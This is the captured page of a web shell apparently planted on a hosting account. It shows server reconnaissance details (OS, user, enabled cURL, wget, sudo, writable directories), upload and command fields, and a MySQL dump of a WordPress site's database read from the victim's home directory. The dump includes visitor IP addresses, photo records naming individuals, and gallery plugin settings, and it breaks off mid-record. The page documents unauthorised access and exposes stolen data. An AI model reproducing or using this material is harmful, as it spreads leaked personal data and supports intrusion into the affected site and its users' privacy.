403Webshell
Server IP : 162.241.226.12  /  Your IP : 216.73.217.142
Web Server : Apache
System : Linux box5305.bluehost.com 5.14.0-687.39.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Aug 18 06:09:16 EDT 2026 x86_64
User : zphiblgz ( 1848)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home2/zphiblgz/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home2/zphiblgz//zphiblgz_wor1.1632342683.sql
-- MySQL dump 10.13  Distrib 5.6.41-84.1, for Linux (x86_64)
--
-- Host: localhost    Database: zphiblgz_wor1
-- ------------------------------------------------------
-- Server version	5.6.41-84.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `lwz_ahm_download_stats`
--

DROP TABLE IF EXISTS `lwz_ahm_download_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_ahm_download_stats` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `pid` int(11) NOT NULL,
  `uid` int(11) NOT NULL,
  `oid` varchar(100) NOT NULL,
  `year` int(4) NOT NULL,
  `month` int(2) NOT NULL,
  `day` int(2) NOT NULL,
  `timestamp` int(11) NOT NULL,
  `ip` varchar(20) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_ahm_download_stats`
--

LOCK TABLES `lwz_ahm_download_stats` WRITE;
/*!40000 ALTER TABLE `lwz_ahm_download_stats` DISABLE KEYS */;
INSERT INTO `lwz_ahm_download_stats` VALUES (1,979,1,'',2017,1,17,1484612498,'50.164.59.70'),(2,989,0,'',2017,5,14,1494763078,'82.80.249.219'),(3,989,0,'',2017,6,25,1498411619,'50.86.54.141'),(4,989,0,'',2017,8,8,1502151271,'70.194.5.234'),(5,989,0,'',2017,8,14,1502715817,'23.31.193.133'),(6,989,0,'',2017,8,15,1502808317,'23.31.193.133'),(7,989,0,'',2017,8,17,1502997972,'23.31.193.133'),(8,989,0,'',2017,9,26,1506406289,'107.218.129.130'),(9,989,0,'',2017,10,12,1507796691,'82.80.249.192'),(10,989,0,'',2017,10,22,1508706204,'107.218.129.130'),(11,989,0,'',2018,3,12,1520826553,'107.77.234.48'),(12,989,0,'',2018,3,12,1520826572,'107.77.234.48'),(13,989,0,'',2018,3,18,1521411424,'172.58.168.10'),(14,989,0,'',2018,4,10,1523359402,'96.244.216.219'),(15,989,0,'',2018,7,16,1531779269,'68.58.200.70'),(16,989,0,'',2018,8,10,1533911639,'99.203.31.81'),(17,989,0,'',2018,8,10,1533911647,'99.203.31.81');
/*!40000 ALTER TABLE `lwz_ahm_download_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_ahm_emails`
--

DROP TABLE IF EXISTS `lwz_ahm_emails`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_ahm_emails` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `email` varchar(255) NOT NULL,
  `pid` int(11) NOT NULL,
  `date` int(11) NOT NULL,
  `custom_data` text NOT NULL,
  `request_status` int(1) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_ahm_emails`
--

LOCK TABLES `lwz_ahm_emails` WRITE;
/*!40000 ALTER TABLE `lwz_ahm_emails` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_ahm_emails` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_bwg_album`
--

DROP TABLE IF EXISTS `lwz_bwg_album`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_bwg_album` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `slug` varchar(255) NOT NULL,
  `description` mediumtext NOT NULL,
  `preview_image` mediumtext NOT NULL,
  `random_preview_image` mediumtext NOT NULL,
  `order` bigint(20) NOT NULL,
  `author` bigint(20) NOT NULL,
  `published` tinyint(1) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_bwg_album`
--

LOCK TABLES `lwz_bwg_album` WRITE;
/*!40000 ALTER TABLE `lwz_bwg_album` DISABLE KEYS */;
INSERT INTO `lwz_bwg_album` VALUES (1,'2015 New Members','photos','','/thumb/LGZ Spring 2015 Intake Class.jpg','',1,17,1);
/*!40000 ALTER TABLE `lwz_bwg_album` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_bwg_album_gallery`
--

DROP TABLE IF EXISTS `lwz_bwg_album_gallery`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_bwg_album_gallery` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `album_id` bigint(20) NOT NULL,
  `is_album` tinyint(1) NOT NULL,
  `alb_gal_id` bigint(20) NOT NULL,
  `order` bigint(20) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_bwg_album_gallery`
--

LOCK TABLES `lwz_bwg_album_gallery` WRITE;
/*!40000 ALTER TABLE `lwz_bwg_album_gallery` DISABLE KEYS */;
INSERT INTO `lwz_bwg_album_gallery` VALUES (2,1,0,1,1);
/*!40000 ALTER TABLE `lwz_bwg_album_gallery` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_bwg_gallery`
--

DROP TABLE IF EXISTS `lwz_bwg_gallery`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_bwg_gallery` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `slug` varchar(255) NOT NULL,
  `description` mediumtext NOT NULL,
  `page_link` mediumtext NOT NULL,
  `preview_image` mediumtext NOT NULL,
  `random_preview_image` mediumtext NOT NULL,
  `order` bigint(20) NOT NULL,
  `author` bigint(20) NOT NULL,
  `published` tinyint(1) NOT NULL,
  `gallery_type` varchar(32) NOT NULL,
  `gallery_source` varchar(256) NOT NULL,
  `autogallery_image_number` int(4) NOT NULL,
  `update_flag` varchar(32) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_bwg_gallery`
--

LOCK TABLES `lwz_bwg_gallery` WRITE;
/*!40000 ALTER TABLE `lwz_bwg_gallery` DISABLE KEYS */;
INSERT INTO `lwz_bwg_gallery` VALUES (1,'2015 New Members','photos','','','/thumb/LGZ Spring 2015 Intake Class.jpg','',1,17,1,'','',0,'');
/*!40000 ALTER TABLE `lwz_bwg_gallery` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_bwg_image`
--

DROP TABLE IF EXISTS `lwz_bwg_image`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_bwg_image` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `gallery_id` bigint(20) NOT NULL,
  `slug` longtext NOT NULL,
  `filename` varchar(255) NOT NULL,
  `image_url` mediumtext NOT NULL,
  `thumb_url` mediumtext NOT NULL,
  `description` mediumtext NOT NULL,
  `alt` mediumtext NOT NULL,
  `date` varchar(128) NOT NULL,
  `size` varchar(128) NOT NULL,
  `filetype` varchar(128) NOT NULL,
  `resolution` varchar(128) NOT NULL,
  `author` bigint(20) NOT NULL,
  `order` bigint(20) NOT NULL,
  `published` tinyint(1) NOT NULL,
  `comment_count` bigint(20) NOT NULL,
  `avg_rating` float NOT NULL,
  `rate_count` bigint(20) NOT NULL,
  `hit_count` bigint(20) NOT NULL,
  `redirect_url` varchar(255) NOT NULL,
  `pricelist_id` int(16) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_bwg_image`
--

LOCK TABLES `lwz_bwg_image` WRITE;
/*!40000 ALTER TABLE `lwz_bwg_image` DISABLE KEYS */;
INSERT INTO `lwz_bwg_image` VALUES (1,1,'LGZ spring 2015 intake','LGZ spring 2015 intake','/LGZ spring 2015 intake.jpg','/thumb/LGZ spring 2015 intake.jpg','Aperture: 2.6\nCamera: SCH-I605\nIso: 400\nOrientation: 1\n','LGZ spring 2015 intake','23 May 2015, 01:35','824 KB','JPG','1200 x 900 px',17,8,1,0,0,0,0,'',0),(2,1,'LGZ Spring 2015 Intake Class','LGZ Spring 2015 Intake Class','/LGZ Spring 2015 Intake Class.jpg','/thumb/LGZ Spring 2015 Intake Class.jpg','','LGZ Spring 2015 Intake Class','23 May 2015, 01:39','126 KB','JPG','640 x 640 px',17,7,1,0,0,0,0,'',0),(3,1,'LGZ spring 2015 line','LGZ spring 2015 line','/LGZ spring 2015 line.jpg','/thumb/LGZ spring 2015 line.jpg','Aperture: 2.4\nCamera: iPhone 5c\nIso: 160\nOrientation: 1\n','LGZ spring 2015 line','23 May 2015, 01:35','661 KB','JPG','1200 x 900 px',17,6,1,0,0,0,0,'',0),(4,1,'LGZ spring 2015','LGZ spring 2015','/LGZ spring 2015.jpg','/thumb/LGZ spring 2015.jpg','Aperture: 2.4\nCamera: iPhone 5c\nIso: 400\nOrientation: 1\n','LGZ spring 2015','23 May 2015, 01:35','700 KB','JPG','1200 x 900 px',17,5,1,0,0,0,0,'',0),(5,1,'Shanee and Christy','Shanee and Christy','/Shanee and Christy.jpg','/thumb/Shanee and Christy.jpg','','Shanee and Christy','23 May 2015, 01:35','107 KB','JPG','805 x 960 px',17,4,1,0,0,0,0,'',0),(6,1,'silly chapter','silly chapter','/silly chapter.jpg','/thumb/silly chapter.jpg','Orientation: 1\n','silly chapter','23 May 2015, 01:40','97 KB','JPG','640 x 640 px',17,3,1,0,0,0,0,'',0),(7,1,'state director','state director','/state director.jpg','/thumb/state director.jpg','Orientation: 1\n','state director','23 May 2015, 01:35','85 KB','JPG','640 x 640 px',17,2,1,0,0,0,0,'',0),(8,1,'up close cake (1)','up close cake (1)','/up close cake (1).jpg','/thumb/up close cake (1).jpg','Aperture: 2.4\nCamera: iPhone 5c\nIso: 125\nOrientation: 1\n','up close cake (1)','23 May 2015, 01:35','607 KB','JPG','1200 x 900 px',17,1,1,0,0,0,0,'',0);
/*!40000 ALTER TABLE `lwz_bwg_image` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_bwg_image_comment`
--

DROP TABLE IF EXISTS `lwz_bwg_image_comment`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_bwg_image_comment` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `image_id` bigint(20) NOT NULL,
  `name` varchar(255) NOT NULL,
  `date` varchar(64) NOT NULL,
  `comment` mediumtext NOT NULL,
  `url` mediumtext NOT NULL,
  `mail` mediumtext NOT NULL,
  `published` tinyint(1) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_bwg_image_comment`
--

LOCK TABLES `lwz_bwg_image_comment` WRITE;
/*!40000 ALTER TABLE `lwz_bwg_image_comment` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_bwg_image_comment` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_bwg_image_rate`
--

DROP TABLE IF EXISTS `lwz_bwg_image_rate`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_bwg_image_rate` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `image_id` bigint(20) NOT NULL,
  `rate` float NOT NULL,
  `ip` varchar(64) NOT NULL,
  `date` varchar(64) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_bwg_image_rate`
--

LOCK TABLES `lwz_bwg_image_rate` WRITE;
/*!40000 ALTER TABLE `lwz_bwg_image_rate` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_bwg_image_rate` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_bwg_image_tag`
--

DROP TABLE IF EXISTS `lwz_bwg_image_tag`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_bwg_image_tag` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `tag_id` bigint(20) NOT NULL,
  `image_id` bigint(20) NOT NULL,
  `gallery_id` bigint(20) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_bwg_image_tag`
--

LOCK TABLES `lwz_bwg_image_tag` WRITE;
/*!40000 ALTER TABLE `lwz_bwg_image_tag` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_bwg_image_tag` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_bwg_option`
--

DROP TABLE IF EXISTS `lwz_bwg_option`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_bwg_option` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `images_directory` mediumtext NOT NULL,
  `masonry` varchar(255) NOT NULL,
  `mosaic` varchar(255) NOT NULL,
  `resizable_mosaic` tinyint(1) NOT NULL,
  `mosaic_total_width` int(4) NOT NULL,
  `image_column_number` int(4) NOT NULL,
  `images_per_page` int(4) NOT NULL,
  `thumb_width` int(4) NOT NULL,
  `thumb_height` int(4) NOT NULL,
  `upload_thumb_width` int(4) NOT NULL,
  `upload_thumb_height` int(4) NOT NULL,
  `image_enable_page` tinyint(1) NOT NULL,
  `image_title_show_hover` varchar(20) NOT NULL,
  `album_column_number` int(4) NOT NULL,
  `albums_per_page` int(4) NOT NULL,
  `album_title_show_hover` varchar(8) NOT NULL,
  `album_thumb_width` int(4) NOT NULL,
  `album_thumb_height` int(4) NOT NULL,
  `album_enable_page` tinyint(1) NOT NULL,
  `extended_album_height` int(4) NOT NULL,
  `extended_album_description_enable` tinyint(1) NOT NULL,
  `image_browser_width` int(4) NOT NULL,
  `image_browser_title_enable` tinyint(1) NOT NULL,
  `image_browser_description_enable` tinyint(1) NOT NULL,
  `blog_style_width` int(4) NOT NULL,
  `blog_style_title_enable` tinyint(1) NOT NULL,
  `blog_style_images_per_page` int(4) NOT NULL,
  `blog_style_enable_page` tinyint(1) NOT NULL,
  `slideshow_type` varchar(16) NOT NULL,
  `slideshow_interval` int(4) NOT NULL,
  `slideshow_width` int(4) NOT NULL,
  `slideshow_height` int(4) NOT NULL,
  `slideshow_enable_autoplay` tinyint(1) NOT NULL,
  `slideshow_enable_shuffle` tinyint(1) NOT NULL,
  `slideshow_enable_ctrl` tinyint(1) NOT NULL,
  `slideshow_enable_filmstrip` tinyint(1) NOT NULL,
  `slideshow_filmstrip_height` int(4) NOT NULL,
  `slideshow_enable_title` tinyint(1) NOT NULL,
  `slideshow_title_position` varchar(16) NOT NULL,
  `slideshow_enable_description` tinyint(1) NOT NULL,
  `slideshow_description_position` varchar(16) NOT NULL,
  `slideshow_enable_music` tinyint(1) NOT NULL,
  `slideshow_audio_url` varchar(255) NOT NULL,
  `popup_width` int(4) NOT NULL,
  `popup_height` int(4) NOT NULL,
  `popup_type` varchar(16) NOT NULL,
  `popup_interval` int(4) NOT NULL,
  `popup_enable_filmstrip` tinyint(1) NOT NULL,
  `popup_filmstrip_height` int(4) NOT NULL,
  `popup_enable_ctrl_btn` tinyint(1) NOT NULL,
  `popup_enable_fullscreen` tinyint(1) NOT NULL,
  `popup_enable_info` tinyint(1) NOT NULL,
  `popup_info_always_show` tinyint(1) NOT NULL,
  `popup_enable_rate` tinyint(1) NOT NULL,
  `popup_enable_comment` tinyint(1) NOT NULL,
  `popup_enable_email` tinyint(1) NOT NULL,
  `popup_enable_captcha` tinyint(1) NOT NULL,
  `popup_enable_download` tinyint(1) NOT NULL,
  `popup_enable_fullsize_image` tinyint(1) NOT NULL,
  `popup_enable_facebook` tinyint(1) NOT NULL,
  `popup_enable_twitter` tinyint(1) NOT NULL,
  `popup_enable_google` tinyint(1) NOT NULL,
  `watermark_type` varchar(8) NOT NULL,
  `watermark_position` varchar(16) NOT NULL,
  `watermark_width` int(4) NOT NULL,
  `watermark_height` int(4) NOT NULL,
  `watermark_url` mediumtext NOT NULL,
  `watermark_text` mediumtext NOT NULL,
  `watermark_link` mediumtext NOT NULL,
  `watermark_font_size` int(4) NOT NULL,
  `watermark_font` varchar(16) NOT NULL,
  `watermark_color` varchar(8) NOT NULL,
  `watermark_opacity` int(4) NOT NULL,
  `built_in_watermark_type` varchar(16) NOT NULL,
  `built_in_watermark_position` varchar(16) NOT NULL,
  `built_in_watermark_size` int(4) NOT NULL,
  `built_in_watermark_url` mediumtext NOT NULL,
  `built_in_watermark_text` mediumtext NOT NULL,
  `built_in_watermark_font_size` int(4) NOT NULL,
  `built_in_watermark_font` varchar(16) NOT NULL,
  `built_in_watermark_color` varchar(8) NOT NULL,
  `built_in_watermark_opacity` int(4) NOT NULL,
  `image_right_click` tinyint(1) NOT NULL,
  `popup_fullscreen` tinyint(1) NOT NULL,
  `gallery_role` tinyint(1) NOT NULL,
  `album_role` tinyint(1) NOT NULL,
  `image_role` tinyint(1) NOT NULL,
  `popup_autoplay` tinyint(1) NOT NULL,
  `album_view_type` varchar(16) NOT NULL,
  `popup_enable_pinterest` tinyint(1) NOT NULL,
  `popup_enable_tumblr` tinyint(1) NOT NULL,
  `show_search_box` tinyint(1) NOT NULL,
  `search_box_width` int(4) NOT NULL,
  `preload_images` tinyint(1) NOT NULL,
  `preload_images_count` int(4) NOT NULL,
  `thumb_click_action` varchar(16) NOT NULL,
  `thumb_link_target` tinyint(1) NOT NULL,
  `comment_moderation` tinyint(1) NOT NULL,
  `popup_hit_counter` tinyint(1) NOT NULL,
  `enable_ML_import` tinyint(1) NOT NULL,
  `showthumbs_name` tinyint(1) NOT NULL,
  `show_album_name` tinyint(1) NOT NULL,
  `show_image_counts` tinyint(1) NOT NULL,
  `upload_img_width` int(4) NOT NULL,
  `upload_img_height` int(4) NOT NULL,
  `play_icon` tinyint(1) NOT NULL,
  `show_masonry_thumb_description` tinyint(1) NOT NULL,
  `slideshow_title_full_width` tinyint(1) NOT NULL,
  `popup_info_full_width` tinyint(1) NOT NULL,
  `show_sort_images` tinyint(1) NOT NULL,
  `autoupdate_interval` int(4) NOT NULL,
  `instagram_access_token` varchar(128) NOT NULL DEFAULT '',
  `description_tb` tinyint(1) NOT NULL,
  `enable_seo` tinyint(1) NOT NULL,
  `autohide_lightbox_navigation` tinyint(1) NOT NULL,
  `autohide_slideshow_navigation` tinyint(1) NOT NULL,
  `read_metadata` tinyint(1) NOT NULL,
  `enable_loop` tinyint(1) NOT NULL DEFAULT '1',
  `enable_addthis` tinyint(1) NOT NULL DEFAULT '0',
  `addthis_profile_id` varchar(32) NOT NULL DEFAULT '',
  `carousel_width` int(4) NOT NULL DEFAULT '300',
  `carousel_height` int(4) NOT NULL DEFAULT '300',
  `carousel_interval` int(4) NOT NULL DEFAULT '5',
  `carousel_image_column_number` int(4) NOT NULL DEFAULT '5',
  `carousel_image_par` varchar(32) NOT NULL DEFAULT '0.75',
  `carousel_enable_autoplay` tinyint(1) NOT NULL DEFAULT '0',
  `carousel_enable_title` tinyint(1) NOT NULL DEFAULT '0',
  `carousel_r_width` int(4) NOT NULL DEFAULT '800',
  `carousel_fit_containerWidth` tinyint(1) NOT NULL DEFAULT '1',
  `carousel_prev_next_butt` tinyint(1) NOT NULL DEFAULT '1',
  `carousel_play_pause_butt` tinyint(1) NOT NULL DEFAULT '1',
  `permissions` varchar(20) NOT NULL DEFAULT 'manage_options',
  `facebook_app_id` varchar(64) NOT NULL DEFAULT '',
  `facebook_app_secret` varchar(64) NOT NULL DEFAULT '',
  `show_tag_box` tinyint(1) NOT NULL DEFAULT '0',
  `show_hide_custom_post` tinyint(1) NOT NULL DEFAULT '0',
  `show_hide_post_meta` tinyint(1) NOT NULL DEFAULT '0',
  `placeholder` varchar(32) NOT NULL DEFAULT '',
  `ecommerce_icon_show_hover` varchar(32) NOT NULL DEFAULT '0',
  `popup_enable_ecommerce` tinyint(1) NOT NULL DEFAULT '0',
  `slideshow_effect_duration` int(4) NOT NULL DEFAULT '1',
  `popup_effect_duration` int(4) NOT NULL DEFAULT '1',
  `use_inline_stiles_and_scripts` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_bwg_option`
--

LOCK TABLES `lwz_bwg_option` WRITE;
/*!40000 ALTER TABLE `lwz_bwg_option` DISABLE KEYS */;
INSERT INTO `lwz_bwg_option` VALUES (1,'wp-content/uploads','vertical','vertical',0,100,5,30,180,90,300,300,1,'none',5,30,'hover',120,90,1,150,1,800,1,1,800,1,5,1,'fade',5,800,500,0,0,1,1,90,0,'top-right',0,'bottom-right',0,'',800,500,'fade',5,1,70,1,1,1,0,0,1,0,0,0,0,1,1,1,'none','bottom-left',90,90,'http://zphiblgz.org/wp-content/plugins/photo-gallery/images/watermark.png','web-dorado.com','https://web-dorado.com',20,'arial','FFFFFF',30,'none','middle-center',15,'http://zphiblgz.org/wp-content/plugins/photo-gallery/images/watermark.png','web-dorado.com',20,'arial','FFFFFF',30,0,0,0,0,0,0,'thumbnail',0,0,0,180,0,10,'open_lightbox',1,0,0,0,0,0,0,1200,1200,1,0,0,0,0,30,'0',0,1,1,1,1,1,0,'',300,300,5,5,'0.75',0,0,800,1,1,1,'manage_options','','',0,0,0,'','0',0,1,1,0);
/*!40000 ALTER TABLE `lwz_bwg_option` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_bwg_shortcode`
--

DROP TABLE IF EXISTS `lwz_bwg_shortcode`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_bwg_shortcode` (
  `id` bigint(20) NOT NULL,
  `tagtext` mediumtext NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_bwg_shortcode`
--

LOCK TABLES `lwz_bwg_shortcode` WRITE;
/*!40000 ALTER TABLE `lwz_bwg_shortcode` DISABLE KEYS */;
INSERT INTO `lwz_bwg_shortcode` VALUES (1,' gallery_type=\"image_browser\" theme_id=\"1\" gallery_id=\"1\" sort_by=\"order\" order_by=\"asc\" show_search_box=\"0\" search_box_width=\"180\" image_browser_width=\"800\" image_browser_title_enable=\"0\" image_browser_description_enable=\"0\" thumb_click_action=\"undefined\" thumb_link_target=\"undefined\" popup_fullscreen=\"0\" popup_autoplay=\"0\" popup_width=\"800\" popup_height=\"500\" popup_effect=\"fade\" popup_interval=\"5\" popup_enable_filmstrip=\"1\" popup_filmstrip_height=\"70\" popup_enable_ctrl_btn=\"1\" popup_enable_fullscreen=\"1\" popup_enable_info=\"1\" popup_info_always_show=\"0\" popup_info_full_width=\"0\" popup_enable_rate=\"0\" popup_enable_comment=\"1\" popup_hit_counter=\"0\" popup_enable_facebook=\"1\" popup_enable_twitter=\"1\" popup_enable_google=\"1\" popup_enable_pinterest=\"0\" popup_enable_tumblr=\"0\" watermark_type=\"none\" watermark_link=\"https%3A%2F%2Fweb-dorado.com\"'),(2,' gallery_type=\"image_browser\" theme_id=\"1\" gallery_id=\"1\" sort_by=\"order\" order_by=\"asc\" show_search_box=\"0\" search_box_width=\"180\" image_browser_width=\"400\" image_browser_title_enable=\"0\" image_browser_description_enable=\"0\" thumb_click_action=\"undefined\" thumb_link_target=\"undefined\" popup_fullscreen=\"0\" popup_autoplay=\"0\" popup_width=\"800\" popup_height=\"500\" popup_effect=\"fade\" popup_interval=\"5\" popup_enable_filmstrip=\"1\" popup_filmstrip_height=\"70\" popup_enable_ctrl_btn=\"1\" popup_enable_fullscreen=\"1\" popup_enable_info=\"1\" popup_info_always_show=\"0\" popup_info_full_width=\"0\" popup_enable_rate=\"0\" popup_enable_comment=\"1\" popup_hit_counter=\"0\" popup_enable_facebook=\"1\" popup_enable_twitter=\"1\" popup_enable_google=\"1\" popup_enable_pinterest=\"0\" popup_enable_tumblr=\"0\" watermark_type=\"none\" watermark_link=\"https%3A%2F%2Fweb-dorado.com\"');
/*!40000 ALTER TABLE `lwz_bwg_shortcode` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_bwg_theme`
--

DROP TABLE IF EXISTS `lwz_bwg_theme`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_bwg_theme` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `default_theme` tinyint(1) NOT NULL,
  `options` longtext NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_bwg_theme`
--

LOCK TABLES `lwz_bwg_theme` WRITE;
/*!40000 ALTER TABLE `lwz_bwg_theme` DISABLE KEYS */;
INSERT INTO `lwz_bwg_theme` VALUES (1,'Theme 1',1,'{\"thumb_margin\":\"4\",\"thumb_padding\":\"0\",\"thumb_border_radius\":\"0\",\"thumb_border_width\":\"0\",\"thumb_border_style\":\"none\",\"thumb_border_color\":\"CCCCCC\",\"thumb_bg_color\":\"FFFFFF\",\"thumbs_bg_color\":\"FFFFFF\",\"thumb_bg_transparent\":\"0\",\"thumb_box_shadow\":\"0px 0px 0px #888888\",\"thumb_transparent\":\"100\",\"thumb_align\":\"center\",\"thumb_hover_effect\":\"scale\",\"thumb_hover_effect_value\":\"1.1\",\"thumb_transition\":\"1\",\"thumb_title_font_color\":\"CCCCCC\",\"thumb_title_font_style\":\"segoe ui\",\"thumb_title_pos\":\"bottom\",\"thumb_title_font_size\":\"16\",\"thumb_title_font_weight\":\"bold\",\"thumb_title_margin\":\"2px\",\"thumb_title_shadow\":\"0px 0px 0px #888888\",\"page_nav_position\":\"bottom\",\"page_nav_align\":\"center\",\"page_nav_number\":\"0\",\"page_nav_font_size\":\"12\",\"page_nav_font_style\":\"segoe ui\",\"page_nav_font_color\":\"666666\",\"page_nav_font_weight\":\"bold\",\"page_nav_border_width\":\"1\",\"page_nav_border_style\":\"solid\",\"page_nav_border_color\":\"E3E3E3\",\"page_nav_border_radius\":\"0\",\"page_nav_margin\":\"0\",\"page_nav_padding\":\"3px 